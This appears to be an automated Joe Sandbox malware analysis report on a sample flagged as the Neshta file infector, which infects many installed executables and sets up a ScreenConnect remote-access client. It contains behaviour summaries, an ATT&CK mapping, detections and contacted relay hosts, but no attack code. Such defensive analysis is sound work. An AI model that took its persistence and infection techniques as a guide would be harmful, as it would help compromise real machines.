                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, type: DROPPED
                          Source: Yara matchFile source: 11.0.ScreenConnect.WindowsClient.exe.920000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.ScreenConnect.WindowsClient.exe.920000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.ScreenConnect.ClientService.exe.3db0000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000009.00000002.1207076385.0000000003DB2000.00000002.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.1187139644.0000000000922000.00000002.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.1203004972.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000000.699734443.0000000000922000.00000002.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: $RUX313H.exe PID: 6336, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Config.Msi\5e0b04.rbs, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Installer\MSIDF1.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF1140 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,1_2_00DF1140
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F1160 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,SysAllocString,SysFreeString,GetModuleHandleW,GetModuleFileNameW,PathRemoveExtensionW,PathFindFileNameW,StrCpyW,StrCpyW,StrCpyW,SafeArrayCreateVector,VariantClear,VariantClear,SysAllocString,SafeArrayPutElement,VariantClear,VariantInit,VariantInit,VariantInit,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysFreeString,VariantClear,VariantClear,9_2_003F1160

                          Mitre Att&ck Matrix

                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Replication Through Removable Media1Native API2DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture121System Time Discovery1Taint Shared Content1Archive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default AccountsCommand and Scripting Interpreter13Application Shimming1Application Shimming1Obfuscated Files or Information1LSASS MemoryPeripheral Device Discovery11Replication Through Removable Media1Input Capture121Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain AccountsService Execution2Windows Service23Windows Service23Software Packing1Security Account ManagerFile and Directory Discovery4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsAt (Windows)Registry Run Keys / Startup Folder1Process Injection12DLL Side-Loading1NTDSSystem Information Discovery35Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder1File Deletion1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading322Cached Domain CredentialsSecurity Software Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemVirtualization/Sandbox Evasion21Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 495328 Sample: $RUX313H.exe Startdate: 01/10/2021 Architecture: WINDOWS Score: 100 76 Antivirus detection for dropped file 2->76 78 Antivirus / Scanner detection for submitted sample 2->78 80 Multi AV Scanner detection for dropped file 2->80 82 4 other signatures 2->82 8 $RUX313H.exe 4 2->8         started        12 msiexec.exe 88 48 2->12         started        14 ScreenConnect.ClientService.exe 2->14         started        17 3 other processes 2->17 process3 dnsIp4 44 C:\Windows\svchost.com, PE32 8->44 dropped 46 C:\Users\user\AppData\Local\...\setup.exe, PE32 8->46 dropped 48 C:\Users\user\AppData\Local\...\$RUX313H.exe, PE32 8->48 dropped 56 108 other malicious files 8->56 dropped 86 Creates an undocumented autostart registry key 8->86 88 Drops PE files with a suspicious file extension 8->88 90 Drops executable to a common third party application directory 8->90 92 Infects executable files (exe, dll, sys, html) 8->92 19 $RUX313H.exe 3 3 8->19         started        50 C:\Windows\Installer\MSIFE7.tmp, PE32 12->50 dropped 52 C:\Windows\Installer\MSIDF2.tmp, PE32 12->52 dropped 54 C:\Windows\Installer\MSI13D3.tmp, PE32 12->54 dropped 58 8 other files (none is malicious) 12->58 dropped 23 msiexec.exe 12->23         started        25 msiexec.exe 12->25         started        27 msiexec.exe 12->27         started        68 server-nixce85832f-relay.screenconnect.com 145.40.105.136, 443, 49728, 49729 BREEDBANDDELFTNL Netherlands 14->68 70 192.168.2.1, 274 unknown unknown 14->70 72 instance-qchhoo-relay.screenconnect.com 14->72 29 ScreenConnect.WindowsClient.exe 14->29         started        file5 signatures6 process7 file8 40 C:\Users\user\AppData\...\$RUX313H.exe.log, ASCII 19->40 dropped 84 Drops executables to the windows directory (C:\Windows) and starts them 19->84 31 svchost.com 1 19->31         started        35 rundll32.exe 7 23->35         started        signatures9 process10 file11 60 C:\Windows\directx.sys, ASCII 31->60 dropped 74 Sample is not signed and drops a device driver 31->74 37 msiexec.exe 6 31->37         started        62 C:\...\ScreenConnect.InstallerActions.dll, PE32 35->62 dropped 64 C:\Users\user\...\ScreenConnect.Core.dll, PE32 35->64 dropped 66 Microsoft.Deployme...indowsInstaller.dll, PE32 35->66 dropped signatures12 process13 file14 42 C:\Users\user\AppData\Local\...\MSIFE41.tmp, PE32 37->42 dropped

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          $RUX313H.exe100%AviraW32/Neshta.A
                          $RUX313H.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Neshta.A
                          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\AutoIt3\Uninstall.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe100%AviraW32/Neshta.A
                          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Neshta.A
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Uninstall.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe100%Joe Sandbox ML
                          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe96%ReversingLabsWin32.Virus.Neshta
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe96%ReversingLabsWin32.Virus.Neshta
                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe96%ReversingLabsWin32.Virus.Neshta

                          Unpacked PE Files

                          SourceDetectionScannerLabelLinkDownload
                          2.2.svchost.com.400000.0.unpack100%AviraW32/Neshta.ADownload File
                          0.0.$RUX313H.exe.400000.0.unpack100%AviraW32/Neshta.ADownload File
                          0.2.$RUX313H.exe.400000.0.unpack100%AviraW32/Neshta.ADownload File
                          2.0.svchost.com.400000.0.unpack100%AviraW32/Neshta.ADownload File

                          Domains

                          No Antivirus matches

                          URLs

                          No Antivirus matches

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          server-nixce85832f-relay.screenconnect.com
                          		145.40.105.136
                          		truefalse
                            		high
                            instance-qchhoo-relay.screenconnect.com
                            		unknown
                            		unknownfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://feedback.screenconnect.com/Feedback.axd$RUX313H.exe, 00000001.00000000.663879724.0000000000E02000.00000002.00020000.sdmp, ScreenConnect.ClientService.exefalse
                                		high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                145.40.105.136
                                		server-nixce85832f-relay.screenconnect.comNetherlands
                                		34108BREEDBANDDELFTNLfalse

                                Private

                                IP
                                192.168.2.1

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:495328
                                Start date:01.10.2021
                                Start time:21:50:26
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 14m 51s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:$RUX313H.exe
                                Cookbook file name:defaultwindowsfilecookbook.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:21
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.spre.spyw.evad.winEXE@22/143@11/2
                                EGA Information:
                                • Successful, ratio: 83.3%
                                HDC Information:
                                • Successful, ratio: 23.8% (good quality ratio 22.6%)
                                • Quality average: 80.9%
                                • Quality standard deviation: 28.5%
                                HCA Information:
                                • Successful, ratio: 63%
                                • Number of executed functions: 295
                                • Number of non-executed functions: 71
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240s for rundll32
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 20.82.209.183, 23.0.174.185, 23.0.174.200, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43
                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Execution Graph export aborted for target rundll32.exe, PID 5384 because it is empty
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
